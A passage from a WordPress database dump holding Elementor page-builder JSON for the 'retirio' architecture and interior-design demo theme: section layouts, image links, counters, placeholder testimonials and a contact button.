flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\"},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3062,4747,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3063,4747,'_elementor_pro_version','3.8.1'),(3064,4747,'_elementor_css','a:6:{s:4:\"time\";i:1670315124;s:5:\"fonts\";a:1:{i:0;s:4:\"Reey\";}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3065,4748,'_wp_page_template','elementor_header_footer'),(3066,4748,'_elementor_edit_mode','builder'),(3067,4748,'_elementor_template_type','wp-page'),(3068,4748,'_elementor_version','3.8.1'),(3069,4748,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"LOREM IPSUM\",\"title\":\"LOREM IPSUM\\n\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Redesign Life<\\/span><\\/p><p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Mike Hardson\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_family\":\"Reey\",\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon 